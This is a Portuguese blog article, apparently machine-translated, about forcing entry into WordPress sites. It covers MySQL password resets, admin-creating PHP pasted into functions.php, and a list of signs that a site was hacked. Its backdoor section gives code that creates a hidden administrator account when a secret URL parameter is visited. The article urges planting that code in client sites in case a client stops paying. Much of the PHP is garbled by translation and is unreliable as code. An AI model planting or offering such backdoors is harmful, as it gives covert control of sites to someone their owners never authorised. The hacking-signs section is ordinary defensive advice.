Como invadir um site WordPress, o guia completo

Como invadir um site WordPress, o guia completo


Não toleramos, aprovamos nem incentivamos nenhum comportamento ilegal ou malicioso! O objetivo deste artigo é explicar como invadir ou recuperar o acesso a um site WordPress que pertence a você ou que você tem direitos para editar, administrar e acessar. Tudo o que você faz, você está fazendo por conta própria. Nós não somos responsáveis ​​por suas ações. Este guia serve apenas para fins educacionais.

Os métodos descritos ajudarão você a recuperar o acesso ao site, mesmo que você não tenha mais uma conta, mas precisarão de algumas informações sobre o site e não ajudarão a invadir qualquer instalação aleatória do WordPress.

Neste guia, estamos prestes a mostrar a você:

  • Como invadir um site WordPress
  • Como criar um backdoor no WordPress
  • Como criar uma nova conta de usuário via FTP
  • 10 sinais de que seu site WordPress foi invadido

Como invadir um site WordPress, o guia completo

Situações em que você pode se ajudar

Se você estiver em uma das seguintes situações, nossos métodos ajudarão você a recuperar o acesso:

  • você esqueceu o nome de usuário ou endereço de email
  • A opção redefinir senha não funciona no servidor de hospedagem
  • redefinir senha e-mails não estão chegando
  • você não tem mais acesso ao endereço de e-mail da conta
  • você sabe o nome de usuário e a senha, mas a combinação simplesmente não funciona

Para usar os métodos descritos abaixo, você precisará apenas um dos seguintes:

  • Acesso FTP ao servidor ou
  • cPanel de acesso ao servidor ou
  • acesso ao banco de dados MySQL e a capacidade de conectar-se a ele remotamente

Método # 1 – a maneira MySQL

Use este método para alterar a senha (ou nome de usuário, se necessário) de um usuário existente ou criar uma nova conta. Você precisará de acesso cPanel ou acesso direto do MySQL ao banco de dados do site. Vamos começar alterando a senha de um usuário existente.

Se você estiver usando o cPanel, faça o login (o cPanel sempre pode ser acessado via https://yoursite.com:2083 link), localize e abra o phpMyAdmin. A lista de bancos de dados e tabelas está à esquerda. Você está procurando a tabela que termina em _Comercial. Provavelmente será wp_users, mas se você tiver mais de um site WordPress instalado no servidor, precisará encontrar o site certo.

A tabela correta terá o usuário que você deseja editar. Siga o mesmo procedimento se estiver se conectando ao MySQL através de algum cliente externo como SQLyog. Depois de localizar a tabela e o registro real do usuário, é hora de alterar a senha.

Como você provavelmente já descobriu até agora, a senha é salva no passagem de usuário hash usando o algoritmo MD5. Abra o gerador MD5 online digite a senha que você deseja usar e clique em “Hash”. Copie a sequência gerada e substitua a senha original com isso. No phpMyAdmin, você pode editar o campo clicando duas vezes nele. O procedimento é semelhante em outros clientes MySQL. Salve as alterações e entre no WordPress com sua nova senha.

Tabela de usuários do WP

Nomes de usuário, senhas com hash e e-mails são armazenados no diretório wp_users tabela de banco de dados

Ainda no método # 1 – criando um novo usuário

Criar um novo usuário é um pouco mais complicado, mas ainda gerenciável em menos de um minuto. Crie um novo registro na tabela de usuários e preencha: user_login, user_pass (hash, usando a função MD5 descrita acima) e user_email. Todos os outros campos podem permanecer vazios; eles não importam. Salve o novo registro. Uma vez salvo, o MySQL fornecerá um ID exclusivo. É o número no campo ID. Lembre se.

Agora vá para _usermeta mesa. Lembrar, o prefixo da tabela deve ser o mesmo do usuário. Por exemplo wp_users e wp_usersmeta. Se o prefixo não for o mesmo, você estará editando a tabela incorreta (de alguma outra instalação do WP) e a nova conta não funcionará. Criaremos dois novos registros. Ignore o umeta_id campo para os dois. Conjunto ID do usuário campo ao valor que você acabou de lembrar (o novo valor de ID na tabela de usuários). Para o primeiro conjunto de registros meta_key para wpct_user_level e meta_value para 10. Para o segundo meta_key para wpct_capabilities e meta_value para a: 1: {s: 13: "administrador"; b: 1;}. Salve ambos. Você terminou – faça o login!

Método # 2 – o modo functions.php

Essa abordagem pode ser utilizada editando o functions.php através do cPanel ou usando um cliente FTP para fazer isso. Se estiver usando o cPanel, encontre o Gerenciador de Arquivos e abra-o. Primeiro, temos que encontrar a pasta do tema ativo.

Vamos para public_html / wp_content / themes pasta. Se você vir seu tema imediatamente e souber qual é, ótimo. Abra sua pasta e comece a editar functions.php. Caso contrário, abra o site, clique com o botão direito do mouse em qualquer lugar, selecione “Exibir fonte”. Em seguida, pressione Ctrl + F e comece a digitar /temas/ em breve, você terá muitos URLs destacados e reconhecerá o nome da pasta do tema ativo.

Encontre-o na estrutura do arquivo, abra e comece a editar functions.php. Copie / cole o seguinte código no final do arquivo. Mente o fechamento ?> Tags PHP, se você as tiver. Eles têm que estar na última linha. Então insira o código antes deles.

$ new_user_email = '[email protected]ínio.com';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'apelido' => $ new_user_email));

$ user = novo WP_User ($ user_id);
$ user-> set_role ('administrador');
}

Edite apenas as duas primeiras linhas do código para refletir sua nova conta. Se já houver um usuário no WP com esse e-mail, uma nova conta não será criada, verifique se é nova. Altere a senha também – não seja invadido por crianças de script. Depois de salvar o arquivo, basta abrir o site, o código será executado, uma nova conta com privilégios de administrador criada e você poderá fazer login com ele.

Depois de fazer isso, lembre-se de excluir o código de functions.php.

Outros métodos de hackers

Ao saber a senha do FTP, cPanel ou MySQL, você está provando que tem acesso legítimo ao servidor e, portanto, deve ter acesso às instalações do WordPress. Se você não possui nenhuma dessas contas, não é bom (invadir sites de outras pessoas), e isso não é legal!

Lembre-se de que obter acesso não autorizado a computadores, sites ou servidores é um crime grave e é prontamente tratado na maioria dos países..

Se você está com medo de que o seu site WordPress possa ser invadido, verifique esta página com o scanner de segurança gratuito do WordPress. Se você não tiver tempo para configurar seu blog, deixe-o fazer isso por você.

Como criar um backdoor no WordPress

Quando a porta da frente está fechada, você pode tentar a porta dos fundos. Isso pode parecer uma maneira maliciosa de usar o código para entrar no site sem ter acesso a ele, mas na verdade há momentos em que você precisa controlar seu próprio site se alguém o roubou.

Se você estiver criando sites para outras pessoas, mais cedo ou mais tarde haverá um cliente que se recusará a pagar por seu trabalho; um cliente que excluirá suas informações de login e assumirá o controle de tudo que você fez. Às vezes, será suficiente criar um novo usuário via FTP ou redefinir uma senha. Quando isso não é suficiente, convém invadir seu caminho de volta ou criar um acesso backdoor às suas páginas de administrador.

Mas se você decidir ocultar um pequeno pedaço de código em seu ambiente WordPress, poderá economizar alguma dignidade e obter acesso ao site WordPress com privilégios de administrador. E é aí que os jogos começam.

Não importa quantas vezes esse ladrão exclua suas informações ou restaure um backup em um servidor que ele provavelmente possui, há uma chance de ele não saber nada sobre entradas de backdoor. Se o fizesse, provavelmente nem precisaria da sua ajuda para configurar o WordPress, certo?

Crie um backdoor:

OK, chega de conversa; aqui está um código que você precisará para fazer o trabalho:

  1. Abrir arquivo functions.php
  2. Copie / cole o seguinte código:
  3. add_action ('wp_head', 'wploop_backdoor');
    função wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    require ('wp-includes / registration.php');
    If (! Username_exists ('username')) {
    $ user_id = wp_create_user ('nome', 'aprovação');
    $ user = novo WP_User ($ user_id);
    $ user-> set_role ('administrador');
    }
    }
    }
    ?>
  4. Salvar alterações

Se você deixar o código como está, tudo o que você precisará fazer para criar um novo administrador no site é visitar http://www.seudominio.com/?backdoor=knockknock

Depois que a página foi carregada, seu novo nome de usuário é “nome” e senha “passar”.

Claro, você pode mudar isso no código acima, alterando “nome” e “aprovação” para o que você quiser. Você também pode alterar o link para sua porta dos fundos alterando ‘backdoor’ e / ou ‘knockknock’ para qualquer coisa que você criar.

Experimente a função – não apenas é divertida, mas também pode ajudá-lo em algum momento no futuro, quando você estiver prestes a criar um site para alguém em quem não pode confiar completamente. Você também deve aprimorar suas habilidades em WordPress e blog.

Como criar uma nova conta de usuário via FTP

Criar novas contas de usuário no WordPress é muito fácil. Como administrador, você precisa navegue para a página de administração de usuários onde você pode criar uma nova conta para qualquer função de usuário. Isso pode ser feito em questão de segundos e um usuário recém-criado pode fazer login imediatamente com o nome de usuário e a senha.

Mas o que acontece se você perder o acesso ao seu administrador do WordPress? As coisas podem ficar um pouco mais complicadas, mas não se preocupe – temos uma função para você que pode salvar sua vida de administrador.

Se outro administrador excluiu sua conta, se você excluiu todos os usuários do banco de dados por engano, usou um plug-in com defeito ou foi hackeado, você ainda pode voltar ao controle. Às vezes, você poderá obter acesso apenas ao servidor FTP enquanto o servidor HTTP estiver fora do seu alcance e precisará criar um novo administrador. Embora esse possa ser um caso raro, a seguinte função poupará você.

Para criar uma nova conta fora do ambiente de administração do WordPress, tudo o que você precisa é de um acesso FTP ao seu site. Como administrador, você deve ter todas as informações necessárias para fazer login no servidor e pode criar rapidamente uma nova conta criando uma nova função no seu tema.

Crie uma nova conta de usuário via FTP:

  1. Abra o cliente FTP e conecte-se à sua conta
  2. Navegue para wp-content / themes
  3. Abra a pasta do tema que você está usando
  4. Procure pelo arquivo functions.php e edite-o
  5. Copie e cole a seguinte função:
  6. função admin_account () {
    $ usuário = 'Nome de usuário';
    $ pass = 'Senha';
    $ email = '[email protected]ínio.com';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = novo WP_User ($ user_id);
    $ user-> set_role ('administrador');
    }}
    add_action ('init', 'admin_account');
    
  7. Alterar nome de usuário, senha e email para algo único
  8. Salvar alterações

Verifique se o nome de usuário, a senha e o endereço de e-mail definidos na função são exclusivos ou a função não funcionará corretamente. Depois de salvar as alterações, você estará pronto e poderá navegar para o painel de login do WP. Use novas informações para efetuar login novamente e depois de verificar a conta, você pode excluir a função do arquivo functions.php.

A função mostrada acima cria uma conta de administrador, mas você pode modificá-la facilmente para criar uma conta com qualquer outra função de usuário. Simplesmente mudar o papel no 8º linha do código para o editor, autor, colaborador, assinante ou qualquer outra função de usuário que você criou.

Infelizmente, se você perdeu sua conta de administrador, também perdeu todas as postagens escritas com esse nome de usuário. É por isso que você deve sempre manter um backup que possa recuperar facilmente. Se você está lendo isso enquanto possui sua conta de administrador, tome isso como um lembrete para criar um backup imediatamente e adicione este artigo aos favoritos, caso você precise criar uma conta fora do WordPress no futuro.

10 sinais de que seu site WordPress foi invadido

WordPress é uma enorme plataforma de blogs. Existem milhões de usuários e parece que o número está crescendo rapidamente a cada dia. As pessoas até tendem a transferir seus sites criados em outros sistemas de gerenciamento de conteúdo para esse sistema de código aberto com mais frequência do que você imagina. E, enquanto isso é bom, isso significa que hackers também colocam o WordPress em primeiro lugar ao tentar invadir sites aleatórios.

Normalmente, se você for hackeado, saberá disso instantaneamente. Seu site ficará inacessível; você não poderá fazer login e, às vezes, um hacker deixará uma mensagem na primeira página. Mas mais frequentemente do que não, você pode nem perceber que algo mudou. Nesta parte do artigo, estamos prestes a mostrar vários sinais que podem mostrar que seu site WordPress foi invadido e algumas soluções para o problema.

1. Login mal sucedido

Este sinal é bastante evidente. Se você usa uma combinação de nome de usuário e senha há algum tempo sem ter problemas, pode ficar desconfiado se de repente o WordPress não reconhecer sua conta. Se um hacker tiver que fazer login no seu site, é provável que ele mude rapidamente seus privilégios de administrador.

Talvez ele tenha mudado sua senha ou excluído completamente sua conta. Antes de começar a entrar em pânico após a primeira vez que o WordPress envia uma mensagem sobre nome de usuário / senha incorretos, considere o fato de que você pode ter digitado uma combinação errada ou ter ativado o botão caps lock.

Solução: Tente recuperar a senha por e-mail ou use outra conta para fazer login novamente. Para garantir que seu login permaneça seguro, recomendamos instalar Login Ninja plugin para WordPress.

2. Conteúdo malicioso é adicionado ao seu site

O site contém um aviso de malware

Se você começar a perceber conteúdo desconhecido no seu site, pode começar a se preocupar. Quando tiverem a chance de acessar sua área de administração, os hackers poderão alterar seu núcleo e seus arquivos de tema e plug-in. Isso significa que eles podem mudar o que quiserem.

Enquanto alguns hackers modificam drasticamente a aparência do seu site e talvez até expliquem que você foi hackeado, outros serão muito mais sutis sobre isso.

Solução: Tente procurar conteúdo oculto no código do site. Pode haver links para sites mal-intencionados hackers plantados no rodapé do site, ou eles podem ter pop-ups instalados que serão abertos regularmente aos seus clientes. Use o Security Ninja para verificar seu site ou monitorar continuamente seu site em busca de tais problemas..

3. Visitas suspeitas

Se você não está acompanhando seu site, deve fazê-lo imediatamente. Uma maneira simples de fazer isso é usar o Google Analytics que, entre muitos outros recursos, pode dizer quantas visitas você recebe e de onde vêm essas visitas. Depois de algum tempo, você conhecerá seu site. Isso significa que você saberá de onde vêm as visitas, saberá quando iniciar uma nova campanha e quando houver novos links de promoção lançados na natureza.

Mas se você perceber repentinamente que seu site está recebendo um grande número de novas visitas do domínio suspeito, convém investigar mais isso, pois seu site pode ser invadido. Normalmente, esse tipo de visita resulta em uma taxa de rejeição de 100%, o que significa que apenas uma página foi acessada. Os hackers freqüentemente usam sistemas automatizados que levarão outros sites ruins aos seus. Seja o código incorreto que é executado no seu site ou você se tornou parte de uma rede de spam, as coisas podem ficar sérias e você terá que verificar se há código malicioso no site..

Solução: Usar Ferramentas para webmasters do Google encontrar domínios suspeitos

4. Uma queda repentina no tráfego

Navegação segura Status do site

Ao contrário do último sinal mencionado de pirataria, este pode alertá-lo porque, de repente, há uma queda no número de visitas. Em vez de indicar novas visitas a você, um hacker pode enviar visitas para fora do seu site. Isso pode acontecer porque um hacker redirecionou seu site para outro. O outro motivo para obter menos visitantes é que o Google colocou na lista negra seu site. Essa ação mostraria uma mensagem para todos os usuários que optarem por não abrir seu site porque ele está infectado.

Solução: Use o Google Status do site de navegação segura para verificar se seu site está marcado como inseguro e atualmente é perigoso visitar.

5. Os resultados do mecanismo de pesquisa são estranhos

Se você não notou nenhuma alteração no site, mas descobre que os resultados da pesquisa no Google e em outros mecanismos de pesquisa são estranhos (mostram títulos diferentes e outros metadados), isso pode ser um sinal claro de um site invadido. Um hacker pode ter alterado seu conteúdo de uma maneira que possa ser visível apenas para um especialista. Ainda assim, a alteração seria visível nos resultados do mecanismo de pesquisa.

Solução: Verifique seu site com Ferramentas para webmasters do Google, e verifique se seu site foi invadido por esse ferramenta online gratuita.

6. Você não pode enviar / receber e-mails

Quando um hacker obtém acesso ao seu site, ele provavelmente desejará use seu servidor para enviar spam a todos os outros. Quando você descobre que não pode enviar ou receber novos emails do WordPress, isso pode ser um sinal claro de que você foi hackeado. Verifique seu e-mail novamente e verifique com seu provedor para garantir que não haja erros.

Solução: Teste seu WordPress função de correio com este plugin grátis.

7. O site não existe

Servidor não encontrado

Às vezes, os hackers não acessam seu site para plantar códigos maliciosos, redirecionar usuários ou usar seu email para spam. As vezes, tudo o que eles querem fazer é travar seu site. Raramente, um hacker excluirá com êxito tudo de todo o servidor. É por isso que é importante que você hospede seus arquivos em uma empresa de hospedagem renomada, que terá segurança e também mantenha backups diários ou pelo menos semanais do seu site. É uma boa prática que você também faça seus próprios backups de tempos em tempos, para que o site possa ser restaurado rapidamente.

Solução: Instale um dos melhores plugins para gerenciamento de backup no WordPress.

8. arquivos suspeitos

Semelhante ao conteúdo malicioso que pode ser adicionado aos arquivos existentes, um hacker pode plantar arquivos extras em qualquer lugar da sua pasta raiz. É bom conhecer o WordPress, mas se você não é tão experiente, deve ter à sua disposição uma ferramenta de segurança que pode verificar todos os seus arquivos e atividades. Recentemente, analisamos o Security Ninja, que é uma ferramenta perfeita para verificar todos os seus arquivos WordPress.

Solução: Tente procurar arquivos que não pertencem à sua instalação do WordPress. Use o Security Ninja para verificar seu site regularmente e encontrar esses arquivos automaticamente. Em seguida, exclua os arquivos ou remova o código malicioso dos arquivos infectados. Não se esqueça do complemento Core Scanner para Security Ninja.

9. Novos membros

Dependendo do seu site, você pode ser o único capaz de adicionar novos membros. Nesse caso, um e-mail informando sobre usuários recém-registrados pode acionar um alarme. Se houver outros administradores com a capacidade de adicionar novos membros, verifique com eles sobre atividades suspeitas.

Solução: Altere o URL de login com um plug-in gratuito, limite o acesso à sua página de login do WordPress usando o arquivo .htpasswd e use o Login Ninja para proteger seu formulário de login o tempo todo.

10. Confira os eventos agendados no seu servidor

Às vezes, um hacker não faz nada com o seu site depois de entrar., eles vão deixar eventos agendados o que pode prejudicar seu site em algum momento no futuro. Essa técnica é perigosa porque um hacker pode deixar a vítima inexperiente sem noção à primeira vista. Você pode estar infectado e não sabe nada sobre isso.

Solução: Verifique seus trabalhos CRON no servidor que você está usando e verifique se não há tarefas agendadas suspeitas.

Empacotando

Esperamos que este artigo o ajude a gerenciar um site WordPress ainda mais seguro e que recupere o acesso a ele em situações ruins. E mesmo que seu site esteja limpo, não tome isso como garantido.
Sempre verifique se o seu blog é o mais seguro possível. Sugerimos plugins de segurança para WordPress, que podem salvá-lo na maioria das vezes. Ainda assim, não use uma senha não segura e tenha cuidado ao invadir seu próprio site WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map